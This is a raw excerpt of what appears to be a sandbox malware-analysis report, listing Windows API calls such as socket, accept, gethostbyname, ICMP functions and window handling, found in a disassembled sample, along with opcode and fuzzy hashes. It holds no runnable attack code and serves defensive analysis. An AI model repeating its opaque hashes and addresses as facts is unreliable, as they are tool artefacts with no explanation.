                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend
                                                                                          • String ID: msctls_trackbar32
                                                                                          • API String ID: 3850602802-1010561917
                                                                                          • Opcode ID: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                          • Instruction ID: c83169f0c5ec68c29a3e9aa847b4a28030a04f73c00385235601d1c9d4ce90e2
                                                                                          • Opcode Fuzzy Hash: e14717e3cb06623c4553287ca90ea840a6fcf4d017620d4062bb11778db8dfcd
                                                                                          • Instruction Fuzzy Hash: 4F1193717403117BE610CAA8DC81F5B73E8AB98B25F204A1AFA50A72C1D2B4FC458B68
                                                                                          APIs
                                                                                            • Part of subcall function 0045EFE7: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,0047D14B,?,?,?,?), ref: 0045F003
                                                                                          • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046BD78
                                                                                          • WSAGetLastError.WSOCK32(00000000,?,?,00000000,?,?), ref: 0046BD83
                                                                                          • inet_ntoa.WSOCK32(00000000,?), ref: 0046BDCD
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ByteCharErrorLastMultiWidegethostbynameinet_ntoa
                                                                                          • String ID: HH
                                                                                          • API String ID: 1515696956-2761332787
                                                                                          • Opcode ID: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                          • Instruction ID: 2fad99cf3c45da3a785a9a513efbde0c8943f1fdc9598a344110207fd9df59bd
                                                                                          • Opcode Fuzzy Hash: 9fa1cc3982deb19834a74a1ffc0ee15940528313d09b960f7f62ca7fb5990435
                                                                                          • Instruction Fuzzy Hash: E21142765043006BC744FB66D885D9FB3A8AFC4318F448C2EF945A7242DA39E949876A
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • GetMenuItemInfoW.USER32 ref: 004497EA
                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00449817
                                                                                          • DrawMenuBar.USER32 ref: 00449828
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Menu$InfoItem$Draw_malloc
                                                                                          • String ID: 0
                                                                                          • API String ID: 772068139-4108050209
                                                                                          • Opcode ID: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
                                                                                          • Instruction ID: 895394c4ac3d8cdb9511dba433443d5742fa96e32f07ab63668b9f5a94eb31d1
                                                                                          • Opcode Fuzzy Hash: c8976dca06d6b4a67e3115e3fbda4fe950bcb9b91ddbb3afb2d21d0cb6793a10
                                                                                          • Instruction Fuzzy Hash: 941182B16042009BF730EB55EC96FABB7A8FB91714F00452EE648CA281DB7A9445CB76
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocTask_wcslen
                                                                                          • String ID: hkG
                                                                                          • API String ID: 2651040394-3610518997
                                                                                          • Opcode ID: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                          • Instruction ID: 372044899b15e8c53ead78f1c779643819f92c4817f04f111663958edd7e2adf
                                                                                          • Opcode Fuzzy Hash: 13332cee77e5ed885d7d4fc6bfcacd5b22b96a16ce8d99b05f9432ebd764b12e
                                                                                          • Instruction Fuzzy Hash: DCE065736442225B97506A79AC045CBA7D8AFB0370B15482BF880E7310E278E89643E5
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(kernel32.dll), ref: 0043417A
                                                                                          • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0043418C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                          • API String ID: 2574300362-1816364905
                                                                                          • Opcode ID: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                          • Instruction ID: 1a9860a365f0c849ce8c10f1c40c5c80f9dda93506fd3415c38c98a37cde1a5a
                                                                                          • Opcode Fuzzy Hash: 58df7aafb5ba6d6c6a2aff3317d08040102bec91f6a73b36e13bbbd5fede489a
                                                                                          • Instruction Fuzzy Hash: F9D05EB1440B039FCB109FA0D80C64BB6E4AB64301F148C2EF885B2654D7B8E8C0CBA8
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434466,?,?,00464B68,?,?,?,?,?,00000000,?,?,00000101,?), ref: 004343DE
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpSendEcho), ref: 004343F0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpSendEcho
                                                                                          • API String ID: 2574300362-58917771
                                                                                          • Opcode ID: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                          • Instruction ID: bde82dd314f67bb94adb8237e566b22d9cd50c1f3059090bebd97951f1ce1dc3
                                                                                          • Opcode Fuzzy Hash: 4b46215cfc07257f28131f0af9bcf44c57d27cd5d24dcd7dc697cbf0f45d51b4
                                                                                          • Instruction Fuzzy Hash: C9D017B45043039BD7105B21D80874A76E4AF58310F118C2FF881E2250CBBCE8808B79
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,0043447D,?,?,00464B56,?,?,?,?,00000000,?,?,00000101,?,?), ref: 0043440D
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCloseHandle), ref: 0043441F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpCloseHandle
                                                                                          • API String ID: 2574300362-3530519716
                                                                                          • Opcode ID: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                          • Instruction ID: 815a2f2ef77883dfca24b23846b24e776c3b140ddfaf16f0983d17b56328066b
                                                                                          • Opcode Fuzzy Hash: 42f9b5773da98e9266fb1162e4ae0909fe6bfc7ac22b46aa183d999fe3c035a4
                                                                                          • Instruction Fuzzy Hash: 9FD017B04443129AD7106B64D80874A76E4AB68302F129C3FF881A2660C7BCA8808B39
                                                                                          APIs
                                                                                          • LoadLibraryA.KERNEL32(ICMP.DLL,?,00434494,?,?,00464A94,?), ref: 0043443C
                                                                                          • GetProcAddress.KERNEL32(00000000,IcmpCreateFile), ref: 0043444E
                                                                                          Strings
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryLoadProc
                                                                                          • String ID: ICMP.DLL$IcmpCreateFile
                                                                                          • API String ID: 2574300362-275556492
                                                                                          • Opcode ID: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                          • Instruction ID: c247b13c068300da1972229949477068df6ba5342f41feac8fae2a533bc96115
                                                                                          • Opcode Fuzzy Hash: aa837af65d1bad252c0530eb36f48db089182c3e5c3795977f5f1506c5c05052
                                                                                          • Instruction Fuzzy Hash: 97D017B04043029ADB105B60D90875A77E4AB68300F118C7FF9A1A2250C7BCA8808B29
                                                                                          APIs
                                                                                          Similarity
                                                                                          • API ID: ClearVariant
                                                                                          • String ID:
                                                                                          • API String ID: 1473721057-0
                                                                                          • Opcode ID: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
                                                                                          • Instruction ID: 4e1e522645e86f73b8885f2d86dba7d443b77ce6b8f7ad4508257b27d10f8221
                                                                                          • Opcode Fuzzy Hash: d2d12c55b876e5fa1efbcf51686f09b2c55b87fd727dd21d929d390e382c4fef
                                                                                          • Instruction Fuzzy Hash: 3DD18D746003018FD724DF25D484A26B7E1EF49704F64887EE9899B3A1D739EC92CB9A
                                                                                          APIs
                                                                                          • __flush.LIBCMT ref: 00414630
                                                                                          • __fileno.LIBCMT ref: 00414650
                                                                                          • __locking.LIBCMT ref: 00414657
                                                                                          • __flsbuf.LIBCMT ref: 00414682
                                                                                            • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                            • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                          Similarity
                                                                                          • API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
                                                                                          • String ID:
                                                                                          • API String ID: 3240763771-0
                                                                                          • Opcode ID: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                          • Instruction ID: ec1a4dff6c5341ad57a53ba98b0f539b864df2cc4a0ba96fecd891c5d8a4160d
                                                                                          • Opcode Fuzzy Hash: da881668a639e25d03d88a6d97948a76b4f19f87a827f6f9fc91a47de182ffa5
                                                                                          • Instruction Fuzzy Hash: 4841A571A00605ABDB249FA5C9445DFB7B6EFC1328F28852FE41997280D77CDEC18B48
                                                                                          APIs
                                                                                          • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00000001,00000000,NULL Pointer assignment,00000001), ref: 00478201
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 00478259
                                                                                          • VariantCopy.OLEAUT32(-00000058,?), ref: 00478270
                                                                                          • VariantCopy.OLEAUT32(-00000078,?), ref: 00478287
                                                                                          Similarity
                                                                                          • API ID: CopyVariant$ErrorLast
                                                                                          • String ID:
                                                                                          • API String ID: 2286883814-0
                                                                                          • Opcode ID: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                          • Instruction ID: 2d87100fc18953c9afe9b7e879878e48daa4ef19e0256d9a4550ae3fa38499cf
                                                                                          • Opcode Fuzzy Hash: 5518b7b53ef3ca50261af568c513a59c65815d8cf0fffae25230fe941ba47538
                                                                                          • Instruction Fuzzy Hash: 5F517C751543409FC310DF69C880A9BBBE4FF88314F448A6EF9499B352DB39E909CB99
                                                                                          APIs
                                                                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 00474068
                                                                                          • WSAGetLastError.WSOCK32(00000000,00000002,00000002,00000011), ref: 00474076
                                                                                          • #21.WSOCK32 ref: 004740E0
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 004740EB
                                                                                          Similarity
                                                                                          • API ID: ErrorLast$socket
                                                                                          • String ID:
                                                                                          • API String ID: 1881357543-0
                                                                                          • Opcode ID: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                          • Instruction ID: ff1742a21ceaee7448286ece46cbaad1fa76dded649dcd1b12ff87c083dae87e
                                                                                          • Opcode Fuzzy Hash: 49e735c62c31738b54d4bbc911449ab864d290153f15be7477df25c465b7d9f8
                                                                                          • Instruction Fuzzy Hash: 7641D9717403006AE720BF6ADC47F5672C89B54B18F14496EF648BF2C3D6FAA881869C
                                                                                          APIs
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00441CDE
                                                                                          • GetWindowRect.USER32(?,?), ref: 00441D5A
                                                                                          • PtInRect.USER32(?,?,?), ref: 00441D6F
                                                                                          • MessageBeep.USER32(00000000), ref: 00441DF2
                                                                                          Similarity
                                                                                          • API ID: Rect$BeepClientMessageScreenWindow
                                                                                          • String ID:
                                                                                          • API String ID: 1352109105-0
                                                                                          • Opcode ID: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                          • Instruction ID: 11ad13a84751b34e4f8a983c71a6a29643224e7bbeba0240db3aabd8edeb2108
                                                                                          • Opcode Fuzzy Hash: f335056d542ece3fcaf1afd85692f97af485635a3f9ffa8235448c3f06d12885
                                                                                          • Instruction Fuzzy Hash: E64192B5A042418FE710DF18D884AABB7E5FFC9311F18866FE8518B360D734AC85CBA5
                                                                                          APIs
                                                                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042387E
                                                                                          • __isleadbyte_l.LIBCMT ref: 004238B2
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,?,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 004238E3
                                                                                          • MultiByteToWideChar.KERNEL32(?,00000009,00000002,00000001,00000000,00000000,?,?,?,00000000,00000002,00000000), ref: 00423951
                                                                                          Similarity
                                                                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                          • String ID:
                                                                                          • API String ID: 3058430110-0
                                                                                          • Opcode ID: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                          • Instruction ID: 550681b3841f0f34ee613cb5364b25607849a03987ccfca5eaaec14299199b49
                                                                                          • Opcode Fuzzy Hash: f131ee11c0d220cb2dc6b3da44158834730645c68ebbd2a61d5b0c3ed448205f
                                                                                          • Instruction Fuzzy Hash: A931C270B00265EFDB20EF64D8849AA7BF5EF01312B9445AAF0A09F291D338CE81CB55
                                                                                          APIs
                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D10A
                                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0045D12B
                                                                                          • DeleteFileW.KERNEL32(00000000,?), ref: 0045D14C
                                                                                          • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000), ref: 0045D16A
                                                                                          Similarity
                                                                                          • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                          • String ID:
                                                                                          • API String ID: 3321077145-0
                                                                                          • Opcode ID: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                          • Instruction ID: 240381fd0e223f31e6bb83dc4f900fe278965bce5f9bbaa9f824fb1079ab41c9
                                                                                          • Opcode Fuzzy Hash: 7cd5f2a63614e36a101d3a24e32b13d83311d412b7f68151a30e37c1c693f1dc
                                                                                          • Instruction Fuzzy Hash: 393180B5900301ABCB10AF71C985A1BF7E8AF84755F10891EF85497392C739FC45CB68
                                                                                          APIs
                                                                                          • GetParent.USER32(?), ref: 004505BF
                                                                                          • DefDlgProcW.USER32(?,00000138,?,?,004A83D8,?,004A83D8,?), ref: 00450610
                                                                                          • DefDlgProcW.USER32(?,00000133,?,?,004A83D8,?,004A83D8,?), ref: 0045065A
                                                                                          • DefDlgProcW.USER32(?,00000134,?,?,004A83D8,?,004A83D8,?), ref: 00450688
                                                                                          Similarity
                                                                                          • API ID: Proc$Parent
                                                                                          • String ID:
                                                                                          • API String ID: 2351499541-0
                                                                                          • Opcode ID: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                          • Instruction ID: e3e31f905615dd8bfbe674c7a91f48f64006a8638b4dc9b760805e547d05c650
                                                                                          • Opcode Fuzzy Hash: 93bb19dea30658450b5dada9832e261aba4ffbe4fc891123e7e77a8d6405a749
                                                                                          • Instruction Fuzzy Hash: 8C3128362411006BC2209B299C58DBB7B58EBC7336F14465BFA54832D3CB769826C768
                                                                                          APIs
                                                                                            • Part of subcall function 00438C85: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00438C95
                                                                                            • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 00461420
                                                                                          • SendMessageW.USER32(00000000,0000102C,00000000,00000002), ref: 0046144F
                                                                                          • __itow.LIBCMT ref: 00461461
                                                                                          • __itow.LIBCMT ref: 004614AB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$__itow$_wcslen
                                                                                          • String ID:
                                                                                          • API String ID: 2875217250-0
                                                                                          • Opcode ID: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                          • Instruction ID: b65c482f8247f617b799fd724a7506577ebf884cdb52d0d4602b18db992df379
                                                                                          • Opcode Fuzzy Hash: 347b44770508ca88cf5981266e998b528a2978f718c0dd2978777487f2c1d3f7
                                                                                          • Instruction Fuzzy Hash: 3A213D7670031067D210BA169C86FAFB794EB94714F08443FFF44AB241EE69E94687EB
                                                                                          APIs
                                                                                          • GetForegroundWindow.USER32 ref: 00472806
                                                                                            • Part of subcall function 00443EEF: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 00443F11
                                                                                            • Part of subcall function 00443EEF: GetCurrentThreadId.KERNEL32 ref: 00443F18
                                                                                            • Part of subcall function 00443EEF: AttachThreadInput.USER32(00000000), ref: 00443F1F
                                                                                          • GetCaretPos.USER32(?), ref: 0047281A
                                                                                          • ClientToScreen.USER32(00000000,?), ref: 00472856
                                                                                          • GetForegroundWindow.USER32 ref: 0047285C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                                          • String ID:
                                                                                          • API String ID: 2759813231-0
                                                                                          • Opcode ID: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                          • Instruction ID: 38f02bd9b1f6bed34cfa7ce2d7f69328ba3456287a0ba45db7850a86b8391dd2
                                                                                          • Opcode Fuzzy Hash: f08c9821fa495b0e17bd1c697e1e5286648ea95901ecf1a9ceb1535147bec3ee
                                                                                          • Instruction Fuzzy Hash: FF2195716403056FE310EF65CC42F5BB7E8AF84708F144D2EF544AB282D6FAB9858795
                                                                                          APIs
                                                                                            • Part of subcall function 0046DD22: IsWindow.USER32(00000000), ref: 0046DD51
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 0047728E
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772A9
                                                                                          • SetWindowLongW.USER32(?,000000EC,00000000), ref: 004772C0
                                                                                          • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001,?,?), ref: 004772D0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long$AttributesLayered
                                                                                          • String ID:
                                                                                          • API String ID: 2169480361-0
                                                                                          • Opcode ID: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                          • Instruction ID: faea1ea985e506ac999786301d765d91882fdca708237d94abe4bce3661c65f1
                                                                                          • Opcode Fuzzy Hash: cf64f2ba38e7b8586118add57273b6dbf74680437e58013ae8f64db123384f26
                                                                                          • Instruction Fuzzy Hash: 5F11B431205510ABD310FB29DD45F9BB798FF91720F10862EF455E72E2C7A8AC45C7A8
                                                                                          APIs
                                                                                          • SendMessageW.USER32 ref: 00448CB8
                                                                                          • GetWindowLongW.USER32(?,000000EC), ref: 00448CE0
                                                                                          • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448D19
                                                                                          • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D62
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$LongWindow
                                                                                          • String ID:
                                                                                          • API String ID: 312131281-0
                                                                                          • Opcode ID: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                          • Instruction ID: 9d6bf2a2f0cb0d5184a29e15ea511504db1ac53b4253ca88fa0f688086887250
                                                                                          • Opcode Fuzzy Hash: 75ae646de43e531ea10203f5aba75cb55710deee3f48b72b110124c921b55059
                                                                                          • Instruction Fuzzy Hash: B12174715053019BF3208F18D98879FB7E4FBD5325F140B2EF594962D0DBB58449C796
                                                                                          APIs
                                                                                          • select.WSOCK32 ref: 0045890A
                                                                                          • __WSAFDIsSet.WSOCK32(00000000,00000000), ref: 00458919
                                                                                          • accept.WSOCK32(00000000,00000000,00000000,00000000,00000000), ref: 00458927
                                                                                          • WSAGetLastError.WSOCK32(00000000), ref: 00458952
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorLastacceptselect
                                                                                          • String ID:
                                                                                          • API String ID: 385091864-0
                                                                                          • Opcode ID: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                          • Instruction ID: 93f38c3b8a65fd8a68e5265ae944391143789c71a4918893f245a539b4228a7d
                                                                                          • Opcode Fuzzy Hash: abc1db9f2e63247cad6e2e0496bedee0f0acb9a353b4738024f17ecaf3b799d2
                                                                                          • Instruction Fuzzy Hash: 1F2166712043019BD314EF29C842BABB7E5AFC4714F144A2EF994DB2C1DBB4A985CB99
                                                                                          APIs
